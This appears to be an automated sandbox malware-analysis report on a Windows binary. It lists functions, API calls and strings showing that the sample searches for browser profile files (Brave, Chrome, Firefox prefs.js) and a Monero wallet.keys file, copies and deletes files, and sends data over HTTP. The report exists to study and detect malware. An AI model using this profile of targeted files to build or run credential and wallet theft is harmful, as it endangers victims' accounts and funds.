String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: f8995b2582d77ea67b692feb5ccec440d586b1ccea2c80da1bab9c901f8587fa
Instruction ID: 5a1b38b8e82e0b820a41b25f514555978f18cf7ae1d5badc44971c83d94e5ceb
Opcode Fuzzy Hash: f8995b2582d77ea67b692feb5ccec440d586b1ccea2c80da1bab9c901f8587fa
Instruction Fuzzy Hash: 4A417A616C2604FBE77CB7F5C942EDD776F5F82B1AFC07A60F80052286CBB065846522

Function 000FBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

FindFirstFileA.KERNEL32(00000000,?,00110B32,00110B2B,00000000,?,?,?,001113F4,00110B2A), ref: 000FBEF5
StrCmpCA.SHLWAPI(?,001113F8), ref: 000FBF4D
StrCmpCA.SHLWAPI(?,001113FC), ref: 000FBF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 000FC7BF
FindClose.KERNEL32(000000FF), ref: 000FC7D1

Strings

Brave, xrefs: 000FC102
\Brave\Preferences, xrefs: 000FC1DB
Preferences, xrefs: 000FC11E
Google Chrome, xrefs: 000FC634

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 5e05cc5d9d8ea60e3cf249f9edcb829578c0be3cfb0b272f1b755a10d6486818
Instruction ID: 341bbafbcfa32e14f51f66e7273861f0282c2329e8e91a76e9c5ee6625d1fedb
Opcode Fuzzy Hash: 5e05cc5d9d8ea60e3cf249f9edcb829578c0be3cfb0b272f1b755a10d6486818
Instruction Fuzzy Hash: 14427672910208ABDB14FB70DD96EFE737CAFA4300F808559B546960C1EF74AB49CB92

Function 00104910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0010492C
FindFirstFileA.KERNEL32(?,?), ref: 00104943
StrCmpCA.SHLWAPI(?,00110FDC), ref: 00104971
StrCmpCA.SHLWAPI(?,00110FE0), ref: 00104987
FindNextFileA.KERNEL32(000000FF,?), ref: 00104B7D
FindClose.KERNEL32(000000FF), ref: 00104B92

Strings

%s\*, xrefs: 00104920
%s\%s, xrefs: 001049A4
%s\%s, xrefs: 001049FB

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 18d2935b744795274f829e15a1762f079ed6ec4021f3f6fffd2b4b3200b62998
Instruction ID: b687da06220507d8e4cafae7fad3f312cbd305049186d9e0257d48d3148eca3c
Opcode Fuzzy Hash: 18d2935b744795274f829e15a1762f079ed6ec4021f3f6fffd2b4b3200b62998
Instruction Fuzzy Hash: 696188B1900619ABCB25EBA0DCC5FEA737CBB58701F04859CB64996081EB71DB85CF91

Function 000F4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Part of subcall function 000F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000F4839
Part of subcall function 000F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000F4849

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000F4915
StrCmpCA.SHLWAPI(?,00CDE928), ref: 000F493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000F4ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00110DDB,00000000,?,?,00000000,?,",00000000,?,00CDE938), ref: 000F4DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000F4E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000F4E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000F4E49
InternetCloseHandle.WININET(00000000), ref: 000F4EAD
InternetCloseHandle.WININET(00000000), ref: 000F4EC5
HttpOpenRequestA.WININET(00000000,00CDE838,?,00CDDFC8,00000000,00000000,00400100,00000000), ref: 000F4B15

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

InternetCloseHandle.WININET(00000000), ref: 000F4ECF

Strings

", xrefs: 000F4BF2
------, xrefs: 000F49BD
------, xrefs: 000F4B28
------, xrefs: 000F4C69
", xrefs: 000F4D33

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 820ac0334fef63538b32959540eb992a733a44cc2a0a952620bdb993b9ee8c32
Instruction ID: e70739da6e6b86869745f59ac32cee7faa088b73d27251e20d374333509c3f86
Opcode Fuzzy Hash: 820ac0334fef63538b32959540eb992a733a44cc2a0a952620bdb993b9ee8c32
Instruction Fuzzy Hash: 9F12C071950218AADB15EB90DDA2FEEB378BF64305F908199B146620D1DFB02F49CF62

Function 00103EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00103EC3
FindFirstFileA.KERNEL32(?,?), ref: 00103EDA
StrCmpCA.SHLWAPI(?,00110FAC), ref: 00103F08
StrCmpCA.SHLWAPI(?,00110FB0), ref: 00103F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0010406C
FindClose.KERNEL32(000000FF), ref: 00104081

Strings

%s\%s, xrefs: 00103EB7

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 8e3dbbeab2d2c6b0c7a524ae9dfddeea7296f13e763d60faaa0549c9715f1ddf
Instruction ID: 2b68b1a0b4abd7e8048277bc3a5a1df294e1bbeea669e2ba50e3b499420d9fca
Opcode Fuzzy Hash: 8e3dbbeab2d2c6b0c7a524ae9dfddeea7296f13e763d60faaa0549c9715f1ddf
Instruction Fuzzy Hash: 785177B2904619EBCB25FBB0DC85EEA737CBB58300F404598B79996080DBB5DB858F91

Function 000FF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001115B8,00110D96), ref: 000FF71E
StrCmpCA.SHLWAPI(?,001115BC), ref: 000FF76F
StrCmpCA.SHLWAPI(?,001115C0), ref: 000FF785
FindNextFileA.KERNELBASE(000000FF,?), ref: 000FFAB1
FindClose.KERNEL32(000000FF), ref: 000FFAC3

Strings

prefs.js, xrefs: 000FF812

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: e8247b8207ff84d20a68248704879c6aaaa6254db55916f5cec648b120117fce
Instruction ID: 0e25978ae98e4c75ef872506d2359ff5392ede70b372321ebe56e6fb375cadc0
Opcode Fuzzy Hash: e8247b8207ff84d20a68248704879c6aaaa6254db55916f5cec648b120117fce
Instruction Fuzzy Hash: EEB133719002089BDB64FF60DC95FFE7379AFA4300F8081A9A54A961D1EF716B49CB92

Function 000F16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0011510C,?,?,?,001151B4,?,?,00000000,?,00000000), ref: 000F1923
StrCmpCA.SHLWAPI(?,0011525C), ref: 000F1973
StrCmpCA.SHLWAPI(?,00115304), ref: 000F1989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000F1D40
DeleteFileA.KERNEL32(00000000), ref: 000F1DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 000F1E20
FindClose.KERNEL32(000000FF), ref: 000F1E32

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Strings

\*.*, xrefs: 000F17F1

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
